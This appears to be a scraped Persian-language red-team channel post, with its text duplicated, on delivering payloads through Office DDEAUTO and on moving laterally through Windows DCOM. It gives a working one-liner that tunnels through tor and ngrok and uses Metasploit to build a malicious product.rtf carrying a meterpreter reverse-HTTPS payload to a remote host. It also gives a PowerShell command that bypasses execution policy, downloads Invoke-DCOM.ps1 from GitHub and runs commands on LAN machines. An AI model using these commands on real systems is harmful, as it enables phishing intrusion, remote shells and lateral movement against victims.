#Office #DDE_Delivery
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
@Unk9vvN
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
apt-get install -y tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use windows/fileformat/office_dde_delivery;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563#file-cactustorchddeauto-sh@Unk9vvN
#DCOM #Lateral_Movement
استفاده از #DCOM Object های مختلف که در سیستم عامل های ویندوز میتواند تعریف و بکار گرفته شود و امکان خوبی برای دور زدن مکانیزم های دفاعی بدهد، چرا که هر کدام از این #DCOM ها میتوانند بستر غیر مستقیمی برای داده هایی باشند که برای آنها ساخته شده اند, برای مثال ExcelDDE که در خصوص #DDE که در فایل فرمت Excel میتواند بکار گرفته شود,
# Open cmd (Administrator)
C:\Users\unk9vvn>
@Unk9vvN
استفاده از #DCOM Object های مختلف که در سیستم عامل های ویندوز میتواند تعریف و بکار گرفته شود و امکان خوبی برای دور زدن مکانیزم های دفاعی بدهد، چرا که هر کدام از این #DCOM ها میتوانند بستر غیر مستقیمی برای داده هایی باشند که برای آنها ساخته شده اند, برای مثال ExcelDDE که در خصوص #DDE که در فایل فرمت Excel میتواند بکار گرفته شود,
# Open cmd (Administrator)
C:\Users\unk9vvn>
%comspec% /K powershell.exe -ExecutionPolicy Bypass -NoExit -Command "$LAN = Get-NetIPAddress | Where-Object -FilterScript { $_.ValidLifetime -Lt ([TimeSpan]::FromDays(1)) } | Select-Object -Property IPAddress; Invoke-WebRequest -Uri https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 -OutFile %temp%\Invoke-DCOM.ps1; cd %temp%; Import-Module .\Invoke-DCOM.ps1; Invoke-DCOM -ComputerName $LAN.IPAddress -Method MMC20.Application -Command 'calc.exe'; Remove-Item %temp%\Invoke-DCOM.ps1; exit"
https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1@Unk9vvN